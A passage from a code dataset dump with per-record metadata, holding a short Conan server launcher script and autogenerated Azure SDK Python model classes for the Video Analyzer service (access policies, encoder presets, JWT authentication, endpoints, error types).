- max_issues: same path, repo, head, and licenses; count 8,747, events 2015-12-01T16:28:48.000Z to 2022-03-31T23:34:53.000Z
- max_forks: path conans/server/server_launcher.py, repo Mattlk13/conan @ 005fc53485557b0a570bb71670f2ca9c66082165, licenses ["MIT"], count 961, events 2015-12-01T16:56:43.000Z to 2022-03-31T13:50:52.000Z
- content:
from conans.server.launcher import ServerLauncher
from conans.util.env_reader import get_env
launcher = ServerLauncher(server_dir=get_env("CONAN_SERVER_HOME"))
app = launcher.server.root_app
def main(*args):
launcher.launch()
if __name__ == "__main__":
main()
- avg_line_length: 18.266667 · max_line_length: 66 · alphanum_fraction: 0.762774
- qsc_code_*_quality_signal: num_words 37, num_chars 274, mean_word_length 5.243243, frac_words_unique 0.567568, frac_chars_top_2grams 0.103093, frac_chars_top_3grams 0, frac_chars_top_4grams 0, frac_chars_dupe_5grams through dupe_10grams 0, frac_chars_replacement_symbols 0, frac_chars_digital 0, frac_chars_whitespace 0.131387, size_file_byte 274, num_lines 14, num_chars_line_max 67, num_chars_line_mean 19.571429, frac_chars_alphabet 0.815126, frac_chars_comments 0, cate_xml_start 0, frac_lines_dupe_lines 0, cate_autogen 0, frac_lines_long_string 0, frac_chars_string_length 0.091241, frac_chars_long_word_length 0, frac_lines_string_concat 0, cate_encoded_data 0, frac_chars_hex_words 0, frac_lines_prompt_comments 0, frac_lines_assert 0
- qsc_codepython_*_quality_signal: cate_ast 1, frac_lines_func_ratio 0.125, cate_var_zero false, frac_lines_pass 0, frac_lines_import 0.25, frac_lines_simplefunc 0, score_lines_no_logic 0.375, frac_lines_print 0
- non-signal qsc_code_* / qsc_codepython_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat (null)
- effective: 1 · hits: 0
---

**Record 9**

- hexsha: 4c4dd7e5ec767d2a5876ed8c611d8ac4661dfd09 · size: 153,586 · ext: py · lang: Python
- max_stars: path sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py, repo praveenkuttappan/azure-sdk-for-python @ 4b79413667b7539750a6c7dde15737013a3d4bd5, licenses ["MIT"], count 2,728, events 2015-01-09T10:19:32.000Z to 2022-03-31T14:50:33.000Z
- max_issues: same path, repo v-xuto/azure-sdk-for-python @ 9c6296d22094c5ede410bc83749e8df8694ccacc, licenses ["MIT"], count 17,773, events 2015-01-05T15:57:17.000Z to 2022-03-31T23:50:25.000Z
- max_forks: same path, repo v-xuto/azure-sdk-for-python @ 9c6296d22094c5ede410bc83749e8df8694ccacc, licenses ["MIT"], count 1,916, events 2015-01-19T05:05:41.000Z to 2022-03-31T19:36:44.000Z
- content:
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class Resource(msrest.serialization.Model):
"""Common fields that are returned in the response for all Azure Resource Manager resources.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
}
def __init__(
self,
**kwargs
):
super(Resource, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.system_data = None
class ProxyResource(Resource):
"""The resource model definition for a Azure Resource Manager proxy resource. It will not have tags and a location.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
}
def __init__(
self,
**kwargs
):
super(ProxyResource, self).__init__(**kwargs)
class AccessPolicyEntity(ProxyResource):
"""Access policies help define the authentication rules, and control access to specific video resources.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param role: Defines the access level granted by this policy. Possible values include:
"Reader".
:type role: str or ~video_analyzer.models.AccessPolicyRole
:param authentication: Authentication method to be used when validating client API access.
:type authentication: ~video_analyzer.models.AuthenticationBase
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'role': {'key': 'properties.role', 'type': 'str'},
'authentication': {'key': 'properties.authentication', 'type': 'AuthenticationBase'},
}
def __init__(
self,
**kwargs
):
super(AccessPolicyEntity, self).__init__(**kwargs)
self.role = kwargs.get('role', None)
self.authentication = kwargs.get('authentication', None)
class AccessPolicyEntityCollection(msrest.serialization.Model):
"""A collection of AccessPolicyEntity items.
:param value: A collection of AccessPolicyEntity items.
:type value: list[~video_analyzer.models.AccessPolicyEntity]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[AccessPolicyEntity]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AccessPolicyEntityCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class AccountEncryption(msrest.serialization.Model):
"""Defines how the Video Analyzer account is (optionally) encrypted.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param type: Required. The type of key used to encrypt the Account Key. Possible values
include: "SystemKey", "CustomerKey".
:type type: str or ~video_analyzer.models.AccountEncryptionKeyType
:param key_vault_properties: The properties of the key used to encrypt the account.
:type key_vault_properties: ~video_analyzer.models.KeyVaultProperties
:param identity: The Key Vault identity.
:type identity: ~video_analyzer.models.ResourceIdentity
:ivar status: The current status of the Key Vault mapping.
:vartype status: str
"""
_validation = {
'type': {'required': True},
'status': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'key_vault_properties': {'key': 'keyVaultProperties', 'type': 'KeyVaultProperties'},
'identity': {'key': 'identity', 'type': 'ResourceIdentity'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AccountEncryption, self).__init__(**kwargs)
self.type = kwargs['type']
self.key_vault_properties = kwargs.get('key_vault_properties', None)
self.identity = kwargs.get('identity', None)
self.status = None
class AudioEncoderBase(msrest.serialization.Model):
"""Base type for all audio encoder presets, which define the recipe or instructions on how audio should be processed.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: AudioEncoderAac.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: Bitrate, in kilobits per second or Kbps, at which audio should be encoded
(2-channel stereo audio at a sampling rate of 48 kHz). Allowed values are 96, 112, 128, 160,
192, 224, and 256. If omitted, the bitrate of the input audio is used.
:type bitrate_kbps: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.AudioEncoderAac': 'AudioEncoderAac'}
}
def __init__(
self,
**kwargs
):
super(AudioEncoderBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
class AudioEncoderAac(AudioEncoderBase):
"""A custom preset for encoding audio with the AAC codec.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: Bitrate, in kilobits per second or Kbps, at which audio should be encoded
(2-channel stereo audio at a sampling rate of 48 kHz). Allowed values are 96, 112, 128, 160,
192, 224, and 256. If omitted, the bitrate of the input audio is used.
:type bitrate_kbps: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AudioEncoderAac, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.AudioEncoderAac' # type: str
class AuthenticationBase(msrest.serialization.Model):
"""Base class for access policies authentication methods.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: JwtAuthentication.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.JwtAuthentication': 'JwtAuthentication'}
}
def __init__(
self,
**kwargs
):
super(AuthenticationBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class CertificateSource(msrest.serialization.Model):
"""Base class for certificate sources.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: PemCertificateList.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.PemCertificateList': 'PemCertificateList'}
}
def __init__(
self,
**kwargs
):
super(CertificateSource, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class CheckNameAvailabilityRequest(msrest.serialization.Model):
"""The check availability request body.
:param name: The name of the resource for which availability needs to be checked.
:type name: str
:param type: The resource type.
:type type: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(CheckNameAvailabilityRequest, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.type = kwargs.get('type', None)
class CheckNameAvailabilityResponse(msrest.serialization.Model):
"""The check availability result.
:param name_available: Indicates if the resource name is available.
:type name_available: bool
:param reason: The reason why the given name is not available. Possible values include:
"Invalid", "AlreadyExists".
:type reason: str or ~video_analyzer.models.CheckNameAvailabilityReason
:param message: Detailed reason why the given name is available.
:type message: str
"""
_attribute_map = {
'name_available': {'key': 'nameAvailable', 'type': 'bool'},
'reason': {'key': 'reason', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(CheckNameAvailabilityResponse, self).__init__(**kwargs)
self.name_available = kwargs.get('name_available', None)
self.reason = kwargs.get('reason', None)
self.message = kwargs.get('message', None)
class CredentialsBase(msrest.serialization.Model):
"""Base class for credential objects.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: UsernamePasswordCredentials.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.UsernamePasswordCredentials': 'UsernamePasswordCredentials'}
}
def __init__(
self,
**kwargs
):
super(CredentialsBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class TokenKey(msrest.serialization.Model):
"""Key properties for JWT token validation.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: EccTokenKey, RsaTokenKey.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param kid: Required. JWT token key id. Validation keys are looked up based on the key id
present on the JWT token header.
:type kid: str
"""
_validation = {
'type': {'required': True},
'kid': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'kid': {'key': 'kid', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.EccTokenKey': 'EccTokenKey', '#Microsoft.VideoAnalyzer.RsaTokenKey': 'RsaTokenKey'}
}
def __init__(
self,
**kwargs
):
super(TokenKey, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.kid = kwargs['kid']
class EccTokenKey(TokenKey):
"""Required validation properties for tokens generated with Elliptical Curve algorithm.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param kid: Required. JWT token key id. Validation keys are looked up based on the key id
present on the JWT token header.
:type kid: str
:param alg: Required. Elliptical curve algorithm to be used: ES256, ES384 or ES512. Possible
values include: "ES256", "ES384", "ES512".
:type alg: str or ~video_analyzer.models.AccessPolicyEccAlgo
:param x: Required. X coordinate.
:type x: str
:param y: Required. Y coordinate.
:type y: str
"""
_validation = {
'type': {'required': True},
'kid': {'required': True},
'alg': {'required': True},
'x': {'required': True},
'y': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'kid': {'key': 'kid', 'type': 'str'},
'alg': {'key': 'alg', 'type': 'str'},
'x': {'key': 'x', 'type': 'str'},
'y': {'key': 'y', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EccTokenKey, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EccTokenKey' # type: str
self.alg = kwargs['alg']
self.x = kwargs['x']
self.y = kwargs['y']
class EdgeModuleEntity(ProxyResource):
"""The representation of an edge module.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:ivar edge_module_id: Internal ID generated for the instance of the Video Analyzer edge module.
:vartype edge_module_id: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'edge_module_id': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'edge_module_id': {'key': 'properties.edgeModuleId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EdgeModuleEntity, self).__init__(**kwargs)
self.edge_module_id = None
class EdgeModuleEntityCollection(msrest.serialization.Model):
"""A collection of EdgeModuleEntity items.
:param value: A collection of EdgeModuleEntity items.
:type value: list[~video_analyzer.models.EdgeModuleEntity]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[EdgeModuleEntity]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EdgeModuleEntityCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class EdgeModuleProvisioningToken(msrest.serialization.Model):
"""Provisioning token properties. A provisioning token allows for a single instance of Azure Video analyzer IoT edge module to be initialized and authorized to the cloud account. The provisioning token itself is short lived and it is only used for the initial handshake between IoT edge module and the cloud. After the initial handshake, the IoT edge module will agree on a set of authentication keys which will be auto-rotated as long as the module is able to periodically connect to the cloud. A new provisioning token can be generated for the same IoT edge module in case the module state lost or reset.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar expiration_date: The expiration date of the registration token. The Azure Video Analyzer
IoT edge module must be initialized and connected to the Internet prior to the token expiration
date.
:vartype expiration_date: ~datetime.datetime
:ivar token: The token blob to be provided to the Azure Video Analyzer IoT edge module through
the Azure IoT Edge module twin properties.
:vartype token: str
"""
_validation = {
'expiration_date': {'readonly': True},
'token': {'readonly': True},
}
_attribute_map = {
'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'},
'token': {'key': 'token', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EdgeModuleProvisioningToken, self).__init__(**kwargs)
self.expiration_date = None
self.token = None
class EncoderPresetBase(msrest.serialization.Model):
"""Base type for all encoder presets, which define the recipe or instructions on how the input content should be processed.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: EncoderCustomPreset, EncoderSystemPreset.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.EncoderCustomPreset': 'EncoderCustomPreset', '#Microsoft.VideoAnalyzer.EncoderSystemPreset': 'EncoderSystemPreset'}
}
def __init__(
self,
**kwargs
):
super(EncoderPresetBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class EncoderCustomPreset(EncoderPresetBase):
"""Describes a custom preset for encoding the input content using the encoder processor.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param audio_encoder: Describes a custom preset for encoding audio.
:type audio_encoder: ~video_analyzer.models.AudioEncoderBase
:param video_encoder: Describes a custom preset for encoding video.
:type video_encoder: ~video_analyzer.models.VideoEncoderBase
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'audio_encoder': {'key': 'audioEncoder', 'type': 'AudioEncoderBase'},
'video_encoder': {'key': 'videoEncoder', 'type': 'VideoEncoderBase'},
}
def __init__(
self,
**kwargs
):
super(EncoderCustomPreset, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EncoderCustomPreset' # type: str
self.audio_encoder = kwargs.get('audio_encoder', None)
self.video_encoder = kwargs.get('video_encoder', None)
class NodeBase(msrest.serialization.Model):
"""Base class for nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: ProcessorNodeBase, SinkNodeBase, SourceNodeBase.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.ProcessorNodeBase': 'ProcessorNodeBase', '#Microsoft.VideoAnalyzer.SinkNodeBase': 'SinkNodeBase', '#Microsoft.VideoAnalyzer.SourceNodeBase': 'SourceNodeBase'}
}
def __init__(
self,
**kwargs
):
super(NodeBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.name = kwargs['name']
class ProcessorNodeBase(NodeBase):
"""Base class for topology processor nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: EncoderProcessor.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.EncoderProcessor': 'EncoderProcessor'}
}
def __init__(
self,
**kwargs
):
super(ProcessorNodeBase, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.ProcessorNodeBase' # type: str
self.inputs = kwargs['inputs']
class EncoderProcessor(ProcessorNodeBase):
"""Encoder processor allows for encoding of the input content. For example, it can used to change the resolution from 4K to 1280x720.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
:param preset: Required. The encoder preset, which defines the recipe or instructions on how
the input content should be processed.
:type preset: ~video_analyzer.models.EncoderPresetBase
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
'preset': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
'preset': {'key': 'preset', 'type': 'EncoderPresetBase'},
}
def __init__(
self,
**kwargs
):
super(EncoderProcessor, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EncoderProcessor' # type: str
self.preset = kwargs['preset']
class EncoderSystemPreset(EncoderPresetBase):
"""Describes a built-in preset for encoding the input content using the encoder processor.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Name of the built-in encoding preset. Possible values include:
"SingleLayer_540p_H264_AAC", "SingleLayer_720p_H264_AAC", "SingleLayer_1080p_H264_AAC",
"SingleLayer_2160p_H264_AAC".
:type name: str or ~video_analyzer.models.EncoderSystemPresetType
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EncoderSystemPreset, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EncoderSystemPreset' # type: str
self.name = kwargs['name']
class Endpoint(msrest.serialization.Model):
"""The endpoint details.
All required parameters must be populated in order to send to Azure.
:param endpoint_url: The URL of the endpoint.
:type endpoint_url: str
:param type: Required. The type of the endpoint. Possible values include: "ClientApi".
:type type: str or ~video_analyzer.models.VideoAnalyzerEndpointType
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'endpoint_url': {'key': 'endpointUrl', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Endpoint, self).__init__(**kwargs)
self.endpoint_url = kwargs.get('endpoint_url', None)
self.type = kwargs['type']
class EndpointBase(msrest.serialization.Model):
"""Base class for endpoints.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: TlsEndpoint, UnsecuredEndpoint.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param credentials: Required. Credentials to be presented to the endpoint.
:type credentials: ~video_analyzer.models.CredentialsBase
:param url: Required. The endpoint URL for Video Analyzer to connect to.
:type url: str
:param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint
URL. This is an optional property, typically used when the endpoint is behind a firewall.
:type tunnel: ~video_analyzer.models.TunnelBase
"""
_validation = {
'type': {'required': True},
'credentials': {'required': True},
'url': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'credentials': {'key': 'credentials', 'type': 'CredentialsBase'},
'url': {'key': 'url', 'type': 'str'},
'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.TlsEndpoint': 'TlsEndpoint', '#Microsoft.VideoAnalyzer.UnsecuredEndpoint': 'UnsecuredEndpoint'}
}
def __init__(
self,
**kwargs
):
super(EndpointBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.credentials = kwargs['credentials']
self.url = kwargs['url']
self.tunnel = kwargs.get('tunnel', None)
class ErrorAdditionalInfo(msrest.serialization.Model):
"""The resource management error additional info.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar type: The additional info type.
:vartype type: str
:ivar info: The additional info.
:vartype info: any
"""
_validation = {
'type': {'readonly': True},
'info': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'info': {'key': 'info', 'type': 'object'},
}
def __init__(
self,
**kwargs
):
super(ErrorAdditionalInfo, self).__init__(**kwargs)
self.type = None
self.info = None
class ErrorDetail(msrest.serialization.Model):
"""The error detail.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: The error code.
:vartype code: str
:ivar message: The error message.
:vartype message: str
:ivar target: The error target.
:vartype target: str
:ivar details: The error details.
:vartype details: list[~video_analyzer.models.ErrorDetail]
:ivar additional_info: The error additional info.
:vartype additional_info: list[~video_analyzer.models.ErrorAdditionalInfo]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'target': {'readonly': True},
'details': {'readonly': True},
'additional_info': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[ErrorDetail]'},
'additional_info': {'key': 'additionalInfo', 'type': '[ErrorAdditionalInfo]'},
}
def __init__(
self,
**kwargs
):
super(ErrorDetail, self).__init__(**kwargs)
self.code = None
self.message = None
self.target = None
self.details = None
self.additional_info = None
class ErrorResponse(msrest.serialization.Model):
"""Common error response for all Azure Resource Manager APIs to return error details for failed operations. (This also follows the OData error response format.).
:param error: The error object.
:type error: ~video_analyzer.models.ErrorDetail
"""
_attribute_map = {
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(ErrorResponse, self).__init__(**kwargs)
self.error = kwargs.get('error', None)
class GroupLevelAccessControl(msrest.serialization.Model):
"""Group level network access control.
:param public_network_access: Whether or not public network access is allowed for specified
resources under the Video Analyzer account. Possible values include: "Enabled", "Disabled".
:type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess
"""
_attribute_map = {
'public_network_access': {'key': 'publicNetworkAccess', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(GroupLevelAccessControl, self).__init__(**kwargs)
self.public_network_access = kwargs.get('public_network_access', None)
class IotHub(msrest.serialization.Model):
"""The IoT Hub details.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param id: Required. The IoT Hub resource identifier.
:type id: str
:param identity: Required. The IoT Hub identity.
:type identity: ~video_analyzer.models.ResourceIdentity
:ivar status: The current status of the Iot Hub mapping.
:vartype status: str
"""
_validation = {
'id': {'required': True},
'identity': {'required': True},
'status': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'ResourceIdentity'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(IotHub, self).__init__(**kwargs)
self.id = kwargs['id']
self.identity = kwargs['identity']
self.status = None
class JwtAuthentication(AuthenticationBase):
"""Properties for access validation based on JSON Web Tokens (JWT).
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param issuers: List of expected token issuers. Token issuer is valid if it matches at least
one of the given values.
:type issuers: list[str]
:param audiences: List of expected token audiences. Token audience is valid if it matches at
least one of the given values.
:type audiences: list[str]
:param claims: List of additional token claims to be validated. Token must contains all claims
and respective values for it to be valid.
:type claims: list[~video_analyzer.models.TokenClaim]
:param keys: List of keys which can be used to validate access tokens. Having multiple keys
allow for seamless key rotation of the token signing key. Token signature must match exactly
one key.
:type keys: list[~video_analyzer.models.TokenKey]
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'issuers': {'key': 'issuers', 'type': '[str]'},
'audiences': {'key': 'audiences', 'type': '[str]'},
'claims': {'key': 'claims', 'type': '[TokenClaim]'},
'keys': {'key': 'keys', 'type': '[TokenKey]'},
}
def __init__(
self,
**kwargs
):
super(JwtAuthentication, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.JwtAuthentication' # type: str
self.issuers = kwargs.get('issuers', None)
self.audiences = kwargs.get('audiences', None)
self.claims = kwargs.get('claims', None)
self.keys = kwargs.get('keys', None)
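# Hedged usage sketch (editor's addition): the '@type' discriminator is fixed by
# __init__, so callers supply only the validation lists. RsaTokenKey is defined
# further down in this module; the issuer, audience and key values below are
# illustrative.
#
#   auth = JwtAuthentication(
#       issuers=["https://sts.example.com"],
#       audiences=["https://videoanalyzer.example.com"],
#       keys=[RsaTokenKey(kid="key1", alg="RS256", n="<modulus>", e="AQAB")],
#   )
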